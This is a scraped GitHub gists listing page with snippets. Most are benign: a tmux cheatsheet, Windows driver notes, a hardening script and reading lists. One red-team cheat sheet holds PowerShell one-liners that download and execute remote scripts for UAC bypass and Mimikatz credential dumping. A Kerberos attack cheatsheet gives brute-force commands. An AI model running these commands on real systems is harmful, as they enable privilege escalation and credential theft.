Skip to content

Instantly share code, notes, and snippets.

View Saltinbank-SyS's full-sized avatar
💭
On travaille en binôme car on est deux dans ma tête ...

Computer button pusher // Autodidact since my childhood || SIN - SIN HACK - HACK || NO-CODE evangelist || Skiddie learning REDTEAMING - Black coffee like my sense of humor Saltinbank-SyS

💭
On travaille en binôme car on est deux dans ma tête ...
543 followers · 1.1k following
View GitHub Profile
@MohamedAlaa
MohamedAlaa / tmux-cheatsheet.markdown
Last active March 5, 2025 19:29
tmux shortcuts & cheatsheet

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname
@TomCan
TomCan / gist:9644966
Last active February 6, 2025 20:13
Inject drivers in Windows installation after motherboard change
Today, after working with Windows for over 15 years now, I finally came across the solution to the
dreadfull BSOD STOP 0x0000007B after replacing the motherboard of a computer, or after moving the
harddrive to another computer, or after doing a P2V, or after ... you get the point.
Requirements:
- Windows install / boot CD
- Chipset / Mobo / Storage drivers of the new motherboard or storage controller
Steps:
- extract all the drivers to a USB thumb drive
@jondb
jondb / readme.md
Created September 16, 2016 22:13
Using SSSS

Install

launch a new ubuntu image

Docker

docker run -i -t ubuntu /bin/bash
apt-get update
apt-get install ssss
@carnal0wnage
carnal0wnage / gist:606c41ac6ec40bf5c69d4db96d9312e3
Created April 28, 2017 16:07
Red Team Books
From: http://redteams.net/bookshelf/
Techie
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
Social Engineering: The Art of Human Hacking by Christopher Hadnagy
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors
@mackwage
mackwage / windows_hardening.cmd
Last active November 27, 2024 04:25
Script to perform some hardening of Windows OS
:: Windows 10 Hardening Script
:: This is based mostly on my own personal research and testing. My objective is to secure/harden Windows 10 as much as possible while not impacting usability at all. (Think being able to run on this computer's of family members so secure them but not increase the chances of them having to call you to troubleshoot something related to it later on). References for virtually all settings can be found at the bottom. Just before the references section, you will always find several security settings commented out as they could lead to compatibility issues in common consumer setups but they're worth considering.
:: Obligatory 'views are my own'. :)
:: Thank you @jaredhaight for the Win Firewall config recommendations!
:: Thank you @ricardojba for the DLL Safe Order Search reg key!
:: Thank you @jessicaknotts for the help on testing Exploit Guard configs and checking privacy settings!
:: Best script I've found for Debloating Windows 10: https://github.com/Sycnex/Windows10Debloater
:
@wdormann
wdormann / acltest.ps1
Created May 1, 2018 15:20
Check for paths that are writable by normal users, but are in the system-wide Windows path. Any such directory allows for privilege escalation.
If (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
Write-Warning "This script will not function with administrative privileges. Please run as a normal user."
Break
}
$outfile = "acltestfile"
set-variable -name paths -value (Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment' -Name PATH).path.Split(";")
Foreach ($path in $paths) {
# This prints a table of ACLs
# get-acl $path | %{ $_.Access } | ft -Wrap -AutoSize -property IdentityReference, AccessControlType, FileSystemRights
@jivoi
jivoi / RedTeam_CheatSheet.ps1
Created July 14, 2018 14:52 — forked from m8sec/RedTeam_CheatSheet.ps1
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@manhay212
manhay212 / telegram_bot_sendtext.py
Last active November 14, 2023 06:55
import requests
def telegram_bot_sendtext(bot_message):
bot_token = ''
bot_chatID = ''
send_text = 'https://api.telegram.org/bot' + bot_token + '/sendMessage?chat_id=' + bot_chatID + '&parse_mode=Markdown&text=' + bot_message
response = requests.get(send_text)
@thesubtlety
thesubtlety / sans-sec660-recommended-reading.md
Created January 5, 2019 00:08
SANS SEC660 GXPN Recommended Reading
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module: